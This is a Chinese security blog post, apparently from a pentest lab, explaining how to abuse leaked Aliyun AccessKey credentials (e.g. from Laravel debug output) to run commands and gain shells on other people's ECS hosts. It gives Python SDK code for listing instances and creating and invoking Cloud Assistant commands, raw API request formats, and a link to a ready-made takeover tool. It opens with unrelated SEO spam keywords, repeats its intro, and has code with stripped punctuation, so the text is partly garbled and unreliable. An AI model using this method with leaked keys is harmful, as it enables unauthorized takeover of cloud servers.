肥城网站建设流程,oem中国代加工网,做外贸a货网站,服装线上结合线下的推广方案简介#xff08;Gamma实验室核心成员#xff1a;一灯老和尚所写#xff09;在日常渗透过程中我们经常遇到信息泄露出ALIYUN_ACCESSKEYID与ALIYUN_ACCESSKEYSECRET#xff08;阿里云API key#xff09;#xff0c;特别是laravel框架得debug信息。APP中也会泄露这些信息Gamma实验室核心成员一灯老和尚所写在日常渗透过程中我们经常遇到信息泄露出ALIYUN_ACCESSKEYID与ALIYUN_ACCESSKEYSECRET阿里云API key特别是laravel框架得debug信息。APP中也会泄露这些信息那么我们如何直接利用这些泄露的api key去拿到别人的阿里云主机shell勒下载链接在文末概述我们说下阿里API有什么用吧以下是官方说明云服务器Elastic Compute ServiceECS可以调用API管理您的云上资源和开发自己的应用程序。ECS API支持HTTP或者HTTPS网络请求协议允许GET和POST方法。您可以通过以下方式调用ECS API详情参考阿里云官方API文档https://help.aliyun.com/document_detail/25484.html?spma2c4g.11186623.6.1276.12244f88jytZ8c开发思路1、通过阿里云SDK使用SDK下载地址https://github.com/aliyun/aliyun-openapi-python-sdkpip安装# Install the core library pip install aliyun-python-sdk-core # Install the ECS management library pip install aliyun-python-sdk-ecs # Install the RDS management library pip install aliyun-python-sdk-rds调用查询ecs主机#!/usr/bin/env python#codingutf-8 from aliyunsdkcore.client import AcsClientfrom aliyunsdkcore.acs_exception.exceptions import ClientExceptionfrom aliyunsdkcore.acs_exception.exceptions import ServerExceptionfrom aliyunsdkecs.request.v20140526.DescribeInstancesRequest import DescribeInstancesRequest client AcsClient(accessKeyId, accessSecret, cn-hangzhou) request DescribeInstancesRequest()request.set_accept_format(json) response client.do_action_with_exception(request)# python2: print(response) print(str(response, encodingutf-8))创建命令#!/usr/bin/env python#codingutf-8 from aliyunsdkcore.client import AcsClientfrom aliyunsdkcore.acs_exception.exceptions import ClientExceptionfrom aliyunsdkcore.acs_exception.exceptions import ServerExceptionfrom aliyunsdkecs.request.v20140526.CreateCommandRequest import CreateCommandRequest client AcsClient(accessKeyId, accessSecret, cn-hangzhou) request CreateCommandRequest()request.set_accept_format(json) response client.do_action_with_exception(request)# python2: print(response) print(str(response, encodingutf-8))这里会返回一个云助手命令id返回结果{ RequestId: E69EF3CC-94CD-42E7-8926-F133B86387C0, CommandId: c-7d2a745b412b4601b2d47f6a768d3a14}执行命令#!/usr/bin/env python#codingutf-8 from aliyunsdkcore.client import AcsClientfrom aliyunsdkcore.acs_exception.exceptions import ClientExceptionfrom aliyunsdkcore.acs_exception.exceptions import ServerExceptionfrom aliyunsdkecs.request.v20140526.InvokeCommandRequest import InvokeCommandRequest client AcsClient(accessKeyId, accessSecret, cn-hangzhou) request InvokeCommandRequest()request.set_accept_format(json) response client.do_action_with_exception(request)# python2: print(response) print(str(response, encodingutf-8))返回结果{ RequestId: E69EF3CC-94CD-42E7-8926-F133B86387C0, InvokeId: t-7d2a745b412b4601b2d47f6a768d3a14} 安全组部分就省略了根据API文档2、通过GET/POST 使用这里先说下公共请求参数名称类型是否必需描述ActionString是API的名称。取值请参见API概览。AccessKeyIdString是访问密钥ID。AccessKey用于调用API而用户密码用于登录 ECS管理控制台。SignatureString是您的签名。取值请参见签名机制。SignatureMethodString是签名方式。取值HMAC-SHA1SignatureVersionString是签名算法版本。取值1.0SignatureNonceString是签名唯一随机数。用于防止网络重放攻击建议您每一次请求都使用不同的随机数。TimestampString是请求的时间戳。按照ISO8601标准表示并需要使用UTC时间格式为yyyy-MM-ddTHH:mm:ssZ。示例2018-01-01T12:00:00Z 表示北京时间2018年01月01日20点00分00秒。VersionString是API版本号格式为YYYY-MM-DD。取值2014-05-26FormatString否返回参数的语言类型。取值范围 · json· xml默认值xml2.1 GET请求https://ecs.aliyuncs.com/?ActionDescribeInstanceStatusRegionIdcn-hangzhouPageSize1PageNumber1InstanceId.1i-bp1j4i2jdf3owlhe****公共请求参数XML返回格式DescribeInstanceStatusResponse PageNumber1/PageNumber InstanceStatuses InstanceStatus StatusRunning/Status InstanceIdi-bp1j4i2jdf3owlhe****/InstanceId /InstanceStatus /InstanceStatuses TotalCount58/TotalCount PageSize1/PageSize RequestId746C3444-9A24-4D7D-B8A8-DCBF7AC8BD66/RequestId/DescribeInstanceStatusResponseJSON返回格式{ PageNumber: 1, InstanceStatuses: { InstanceStatus: [ { Status: Running, InstanceId: i-bp1j4i2jdf3owlhe**** } ] }, TotalCount: 58, PageSize: 1, RequestId: 746C3444-9A24-4D7D-B8A8-DCBF7AC8BD66}2.2 POST请求POST / HTTP/1.1Host: ecs.aliyuncs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/webp,*/*;q0.8Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 0 ActionDescribeInstanceStatusRegionIdcn-hangzhouPageSize1PageNumber1InstanceId.1i-bp1j4i2jdf3owlhe****公共请求参数返回跟GET方式一样工具使用图形化界面没什么说的。附一张截图相信大家都明白了。结束阿里云为运维人员与开发人员提供了方便但同时自身也要加强安全意识注意自己的key不要泄露不然直接接管阿里云所有esc主机风险比一般高危漏洞都还要高。下载链接及漏洞文章项目链接https://github.com/mrknow001/aliyun-accesskey-Tools工具下载链接https://github.com/mrknow001/aliyun-accesskey-Tools/releases/download/1.0/Aliyun-.AK.Tools.exe欢迎大家关注微信公众号Gamma安全实验室会不定期发表技术文章和安全工具
